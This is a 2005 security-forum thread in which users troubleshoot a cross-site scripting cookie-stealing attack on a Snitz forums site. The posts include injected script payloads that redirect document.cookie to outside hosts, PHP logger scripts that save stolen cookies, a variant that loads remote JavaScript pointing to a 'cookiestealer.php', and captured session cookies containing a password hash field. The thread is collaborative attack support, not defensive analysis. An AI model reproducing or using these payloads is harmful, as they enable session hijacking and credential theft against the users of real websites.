|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
XSS cookie in address bar |
|
Posted: Wed Apr 13, 2005 9:36 am |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
My question is after xss i don't get cookie logged in a file but it is showed in address bar instead.Where do i get wrong,thanks |
|
|
|
|
|
Re: XSS cookie in address bar |
|
Posted: Wed Apr 13, 2005 10:17 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
oxygenne wrote: | My question is after xss i don't get cookie logged in a file but it is showed in address bar instead.Where do i get wrong,thanks |
More details please |
|
|
|
|
|
XSS |
|
Posted: Wed Apr 13, 2005 2:50 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
Well its snitz forums and there exists XSS in links_showsub.asp?cat_id=4&cat=XSS
So basicly i inject folowing script
<script>document.location='http://www.host.com/script.php?cookie='+document.cookie;</Script>
where script.php is:
<?php
$fp = fopen('logger.txt','a'); // open to append
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>
Instead of having cookie logged in a logger.txt the cookie is displayed in the address bar.This is the reslut
http://forums.xxx.com/www.host.com/script.php?cookie=Snitz00arrRqCalForumID=1%2C41%2C4%1C18%2C76;%20ASPSESSIONIDCCCAQTBS=
So why is not cookie logged in a logger.txt file |
|
|
|
|
|
|
|
|
Posted: Wed Apr 13, 2005 4:13 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This logger code seems to be ok. Maybe you don't have write permissions to specific directory?
So, i suggest to add some debug code:
Code: |
<?php
$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>
|
|
|
|
|
|
|
Still same |
|
Posted: Thu Apr 14, 2005 11:05 am |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
Nope the result its still the same maybe this is some kind of http response splitting or... |
|
|
|
|
Posted: Thu Apr 14, 2005 12:27 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
You wrote before:
Quote: |
the cookie is displayed in the address bar
|
This is normal, because you have making GET request, so those parameters are as part of the request URI.
But problem still stays - for some reason script is not writing to the file.
Question - if you look at webserver directory after script is worked,
is there empty log file or no log file at all??
And you can add some more debug code, to see, if GET parameters are accessible:
Code: |
<?php
$test = $_GET['cookie'];
echo "cookie --> $test\n";
$fp = fopen('logger.txt','a'); // open to append
if(!$fp)
{
die('f**ck, can't open file to write!');
}
fwrite($fp, $_GET['cookie']."~~~~~~~~~"); // write the cookie information
fclose($fp);
?>
|
|
|
|
|
|
|
|
|
|
Posted: Thu Apr 14, 2005 12:32 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
Wait a minute, seems that i was getting wrong picture
You mean, that script WRITES to log file SOMETHING as:
Code: |
Snitz00arrRqCalForumID=1%2C41%2C4%1C18%2C76;%20ASPSESSIONIDCCCAQTBS=
|
but there is no actual password hash? Am i right? |
|
|
|
|
|
Here it is |
|
Posted: Thu Apr 14, 2005 12:41 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Thu Apr 14, 2005 2:13 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
try adding a "window", so the script looks like:
Code: |
<script>window.document.location='http://www.host.com/script.php?cookie='+window.document.cookie;</Script>
|
maybe it helps, since web browsers are changed in mean while |
|
_________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
Posted: Thu Apr 14, 2005 2:55 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
No help for me:( still the same
Im using url encoder from winfosec but im sure thats not the problem |
|
|
|
|
Posted: Thu Apr 14, 2005 8:13 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
I Think the problem is somewhere in the quote after "cookie=" parametar
<script>document.location='http://www.host.info/cookie.php?cookie='+document.cookie</Script>
after i put it like this
<script>document.location='http://www.host.info/cookie.php?cookie=+document.cookie'</Script>
the file is immediatelly created but without cookie in it |
|
|
|
|
Posted: Thu Apr 14, 2005 10:20 pm |
|
|
no0bz |
Regular user |
|
|
Joined: Aug 06, 2004 |
Posts: 5 |
Location: cordoba, argentina |
|
|
|
|
|
|
ey dude waxup... why dont u try some .js file i did it in that way and cookiestealer.php works pretty cool...
look in da xss put some like this
Code: | <script src="http://whtaeveruwant.com/iwillredirectu.js"></script> |
and in da js file just put
Code: |
window.location='http://usuarios.lycos.es/xinzane/cookiestealer.php?cookie='+document.cookie'; |
Greetz |
|
_________________ Try me... |
|
|
|
|
|
|
|
Posted: Sat Apr 16, 2005 12:43 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
oxygenne wrote: | I Think the problem is somewhere in the quote after "cookie=" parametar
<script>document.location='http://www.host.info/cookie.php?cookie='+document.cookie</Script>
after i put it like this
<script>document.location='http://www.host.info/cookie.php?cookie=+document.cookie'</Script>
the file is immediatelly created but without cookie in it |
im curios why this happen, ive already try some kind of cookies stealing script a long time ago n it workz, but when u post the message , i have to try it again
so i use your script
before that i create a file called "logger.txt" with permission 777 in the same directory with cookie.php.
then i run some XSS on vulnerable CMS (i have one) then the command will redirect it to script (cookie.php) my laptop to write the cookies to a file (logger.txt).
n IT workzzz fine |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
cgi script |
|
Posted: Sun Apr 17, 2005 3:31 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
Well the only script that managed to log the cookie is based upon this
My cookie = user=zeno; id=021
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
It sends a request to my site that looks like this.
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space
But the source of cookie.cgi is not given. |
|
|
|
|
Posted: Sun Apr 17, 2005 3:38 pm |
|
|
oxygenne |
Advanced user |
|
|
Joined: Apr 13, 2005 |
Posts: 52 |
|
|
|
|
|
|
|
forgot to mention the responce cookie is on following format
cookie=Snitz00arrRqCalForumID=1%2C41%2C3%2C18%2C84;%20Snitz00User=Pword=md5hash&Name=userid;%20ASPSESSIONIDASRQCSAS=CGGBCJDBBBDGBILOMCNJPCNH;%20ASPSESSIONIDAQRRDTAT=LONAMMDBCAIGDCGLEEKHCGEK |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|